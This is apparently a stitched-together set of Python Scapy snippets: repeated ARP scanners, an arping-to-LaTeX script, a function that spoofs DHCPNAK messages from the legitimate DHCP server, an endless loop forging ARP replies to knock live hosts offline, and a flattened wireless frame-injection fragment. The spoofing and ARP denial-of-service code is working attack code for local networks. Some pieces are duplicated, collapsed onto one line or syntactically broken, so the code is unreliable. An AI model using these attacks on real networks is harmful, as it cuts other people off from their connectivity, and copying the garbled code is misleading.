def arping(iprange="10.0.1.0/24"):
    """Broadcast ARP requests for *iprange* and collect the hosts that reply.

    *iprange* is a single IP address or a network in CIDR notation.  Returns
    a list holding one ``[ip, mac]`` pair of strings per reply received
    within the 2-second timeout.

    The pairs are copied verbatim from the replies.  ARP is unauthenticated,
    so the mapping is what each responder claims, not a verified binding.
    """
    # Side effect: lowers Scapy's verbosity for the whole process.
    conf.verb = 0
    probe = Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=iprange)
    answered, _unanswered = srp(probe, timeout=2)
    return [
        reply.sprintf(r"%ARP.psrc% %Ether.src%").split()
        for _sent, reply in answered
    ]
def nak_request(pkt):
    """Send a DHCPNAK built from *pkt* and the recorded DHCP server identity.

    The source MAC and IP are read from the module globals
    ``dhcp_server_mac`` and ``dhcp_server_ip``; a ``KeyError`` is raised if
    either has not been set.  Destination addresses, the client hardware
    address and the BOOTP transaction id are copied from *pkt*.

    Frames like this one carry a server identity the sender does not own;
    DHCP snooping on access switches exists to drop server messages that
    arrive on untrusted ports.
    """
    server_mac = globals()['dhcp_server_mac']
    msg("Spoofing DHCPNAK from " + server_mac, 2)

    link = Ether(src=server_mac, dst=pkt[Ether].dst)
    server_ip = globals()['dhcp_server_ip']
    network = IP(src=server_ip, dst=pkt[IP].dst)
    transport = UDP(sport=67, dport=68)
    # op=2 is a BOOTP reply; xid must echo the request's transaction id.
    bootp = BOOTP(
        op=2,
        ciaddr=pkt[IP].src,
        siaddr=pkt[IP].dst,
        chaddr=pkt[Ether].src,
        xid=pkt[BOOTP].xid,
    )
    dhcp = DHCP(options=[
        ('server_id', server_ip),
        ('message-type', 'nak'),
        'end',
    ])
    sendp(link / network / transport / bootp / dhcp)
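def arping(iprange="10.0.1.0/24"):
    """Broadcast ARP requests for *iprange* and return the replies.

    *iprange* is a single IP address or a network in CIDR notation.  The
    result is a list of ``[ip, mac]`` string pairs, one per reply received
    within the 2-second timeout.  The values are whatever each responder
    put in its reply; ARP offers no way to verify them.
    """
    # Side effect: lowers Scapy's verbosity for the whole process.
    conf.verb = 0
    ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=iprange), timeout=2)
    collection = []
    for snd, rcv in ans:
        collection.append(rcv.sprintf(r"%ARP.psrc% %Ether.src%").split())
    return collection


if __name__ == '__main__':
    if len(sys.argv) > 1:
        # One scan per command-line argument.
        for ip in sys.argv[1:]:
            print("arping %s" % ip)
            print(arping(ip))
    else:
        # The original called the misspelled name `apring()`, which raised
        # NameError whenever the script ran without arguments.
        print(arping())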
def fisting():
    """Loop forever: probe each address in argv[1] with ARP, send it a forged reply, probe again.

    NOTE(review): this listing was collapsed onto one line, so the nesting
    below is reconstructed from the statement order and the else pairing;
    confirm it against the original file.

    Seen from the network, each ``send(a)`` is an unsolicited ARP reply whose
    sender IP equals its target IP.  ARP monitoring and dynamic ARP
    inspection flag or drop such frames, since the claimed IP/MAC binding
    does not match the one on record.
    """
    # op=2 is an ARP reply ("is-at"); pdst comes straight from the command line.
    arp_fist = ARP(pdst=argv[1], op=2)
    print "We are going to loop forever, CTRL-C to stop...\n"
    while True:
        sleep(3)
        # presumably Scapy expands a network given in pdst into one packet
        # per address here -- TODO confirm
        for a in arp_fist:
            # Broadcast who-has request used as a liveness probe.
            arping = Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=a.pdst)
            ans, unans = srp(arping, timeout=0.1)
            if len(ans) == 1:
                # The host answered: set the reply's sender IP to the host's
                # own address and send it.
                a.psrc = a.pdst
                print a.pdst, "is ALIVE!"
                print "* Time to shut it down!"
                send(a)
                # Probe again; an unanswered probe is reported as success.
                ans2, unans2 = srp(arping, timeout=0.1)
                if len(unans2) == 1:
                    print "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
                    print "@@@", a.psrc, "was rubber fisted!"
                    print "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
                    sleep(3)
                else:
                    print "FAILED:", a.pdst, "is still alive :-("
            else:
                print a.pdst, "is already DEAD!"
            # Blank line between hosts.
            print
print "Interface %s created. Configure it and use it" % ifname # Speed optimization si Scapy does not have to parse payloads Ether.payload_guess = [] SNAP.payload_guess = [] try: while 1: r = select([f, s], [], [])[0] # frame from /dev/net/tun if f in r: # tuntap frame max. size is 1522 (ethernet, see RFC3580) + 4 buf = os.read(f, 1526) eth_rcvd_frame = Ether(buf[4:]) if DEBUG: os.write(1, "Received from %s\n" % ifname) if VERB: os.write(1, "%s\n" % eth_rcvd_frame.summary()) # Prepare Dot11 frame for injection dot11_sent_frame = Dot11(type="Data", FCfield="from-DS", addr1=eth_rcvd_frame.getlayer(Ether).dst, addr2=BSSID) # It doesn't seem possible to set tuntap interface MAC address # when we create it, so we set source MAC here if not HAS_SMAC: dot11_sent_frame.addr3 = eth_rcvd_frame.getlayer(Ether).src
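attempted_dhcpnaks = {}

# This dict holds the MAC addresses of DHCP clients which have sent a
# DHCPREQUEST. We cross-reference it with ARP packets to see from which DHCP
# server a lease was obtained.
macs = {}


def msg(string, level):
    """Print *string* when the global ``verbose`` setting is at least *level*."""
    if globals()['verbose'] >= level:
        print(string)


# Sending a DHCPDISCOVER to acquire the DHCP server IP.
msg("Sending DHCPDISCOVER packet to discover DHCP servers", 2)
sendp(
    Ether(src="00:00:00:00:00:00", dst="ff:ff:ff:ff:ff:ff")
    / IP(src="0.0.0.0", dst="255.255.255.255")
    / UDP(sport=68, dport=67)
    / BOOTP(chaddr="\x00\x00\x00\x00\x00\x00", xid=0x10000000)
    / DHCP(options=[('message-type', 'discover'), ('end')]))


# Filtering out the DHCP server's IP address and storing it in a global
# variable. We ignore our own DHCP server via a bpf filter in the sniff
# command below.
def get_dhcp_server(pkt):
    """Record the source IP and MAC of a DHCPOFFER in module globals.

    Packets without a DHCP layer are ignored.  The message type is read from
    the first DHCP option only, so an offer that lists another option first
    is not recognised.
    """
    # `pkt[DHCP]` raises IndexError when the layer is absent, so the original
    # `if pkt[DHCP] and ...` guard could never evaluate to False; test for
    # the layer explicitly instead.
    if pkt.haslayer(DHCP) and pkt[DHCP].options[0][1] == 2:  # 2 = DHCPOFFER
        globals()["dhcp_server_ip"] = pkt[IP].src
        globals()["dhcp_server_mac"] = pkt[Ether].src
        msg("Legit DHCP server found on " + globals()['dhcp_server_ip'], 1)

# Detecting DHCPREQUEST packets and ARP packets.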
def __call__(self):
    """Rebuild and return the original Scapy packet.

    The stored contents are dissected again as an Ethernet frame and the
    stored timestamp is copied onto the result.
    """
    # NOTE(review): if this method sits in a class body, the four-underscore
    # attribute names are subject to Python's private name mangling.
    restored = Ether(self.____contents)
    restored.time = self.____time
    return restored
print "Interface %s created. Configure it and use it" % ifname # Speed optimization si Scapy does not have to parse payloads Ether.payload_guess=[] SNAP.payload_guess=[] try: while 1: r = select([f,s],[],[])[0] # frame from /dev/net/tun if f in r: # tuntap frame max. size is 1522 (ethernet, see RFC3580) + 4 buf = os.read(f,1526) eth_rcvd_frame=Ether(buf[4:]) if DEBUG: os.write(1,"Received from %s\n" % ifname) if VERB: os.write(1,"%s\n" % eth_rcvd_frame.summary()) # Prepare Dot11 frame for injection dot11_sent_frame = Dot11( type = "Data", FCfield = "from-DS", addr1 = eth_rcvd_frame.getlayer(Ether).dst, addr2 = BSSID) # It doesn't seem possible to set tuntap interface MAC address # when we create it, so we set source MAC here if not HAS_SMAC:
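#! /usr/bin/env python
# arping2tex : arpings a network and outputs a LaTeX table as result

import sys

# Exactly one argument is expected: the network (or host) to scan.
if len(sys.argv) != 2:
    print("Usage: arping2tex <net>\n eg: arping2tex 192.168.1.0/24")
    sys.exit(1)

# Imported after the argument check so the usage message appears without
# loading Scapy.
from scapy import srp, Ether, ARP, conf

conf.verb = 0
# Broadcast an ARP request for every address in the range; wait 2 s for replies.
ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=sys.argv[1]), timeout=2)

# One table row per reply.  The MAC and IP cells are taken from the replies
# themselves, i.e. they are what each host claims.
print("\\begin{tabular}{|l|l|}")
print("\\hline")
print("MAC & IP\\\\")
print("\\hline")
for s, r in ans:
    print(r.sprintf("%Ether.src% & %ARP.psrc%\\\\"))
print("\\hline")
# The original wrote "\end", relying on "\e" being an unrecognised escape;
# the backslash is now escaped like the other lines (same output).
print("\\end{tabular}")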
from scapy import srp, Ether, ARP, conf

# Lower Scapy's verbosity so only the result lines are printed.
conf.verb = 0

# Broadcast a single ARP request for 10.0.1.1 and wait up to 2 seconds.
probe = Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst="10.0.1.1")
ans, unans = srp(probe, timeout=2)

# Print "<mac> <ip>" for every reply, exactly as the responder reported them.
for _sent, reply in ans:
    print(reply.sprintf(r"%Ether.src% %ARP.psrc%"))
#from scapy.all import srp,Ether,ARP,conf import sys from datetime import datetime try: interface = raw_input("enter iface") ips = raw try: from scapy import srp,Ether,ARP,conf except ImportError: del scapy from scapy import all as scapy conf.verb = 0 ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff"))/ARP, timeout = 2, iface = interface, inter =0.1